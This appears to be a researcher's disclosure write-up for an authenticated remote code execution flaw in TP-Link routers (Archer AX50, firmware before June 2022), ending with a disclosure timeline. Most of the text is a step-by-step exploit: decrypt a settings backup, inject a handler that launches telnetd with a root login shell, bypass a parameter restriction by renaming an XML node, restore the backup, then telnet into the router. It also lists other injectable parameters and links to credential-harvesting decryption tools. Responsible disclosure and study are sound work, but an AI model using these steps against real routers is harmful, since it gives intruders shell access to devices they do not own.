Authenticated Remote Code Execution in Tp-Link Routers
If your Tp-Link router has backup and restore functionality and firmware is older than june 2022, it is probably vulnerable
Tp-Link Archer AX50, other tplink routers may use different format of backups and exploit needs to be modified
Using exploit for starting telnet daemon on the router
- login to router web interface
- go to advanced -> system -> backup settings
- decrypt and decompress backup file
- if your router uses different format of backup files you can modify exploit code (class BackupParser) or simply use some tool from github:
https://github.com/stdnoerr/tp_link_credentials_harvester/blob/master/decrypt.py
https://github.com/ret5et/tplink_backup_decrypt_2022.bin
...
- in decrypted xml file you can find something like this:
<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
- replace it with these lines
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
- there is a restriction that blocks modification of parameter
system.button.handler
, but it can be easily bypassed by changing name of parent xml node (e.g.name="exploit"
) - code execution can be achieved not only by changing parameter
system.button.handler
, but also usingddns.service.ip_script
,firewall.include.path
,uhttpd.main
, and others...
- compress and encrypt modified backup file
- go to advanced -> system -> restore settings -> upload modified backup file
- after reboot, push the led button that triggers execution of injected command
/usr/sbin/telnetd -l /bin/login.sh
- remotelly login to router:
telnet 192.168.1.1
15.03.2022 - Identified vulnerability
15.03.2022 - Contacted Tp-Link support
16.03.2022 - Recieved response from Tp-Link
02.05.2022 - Assigned CVE
27.05.2022 - Tp-Link released firmware with fixed vulnerability
07.06.2022 - Published technical details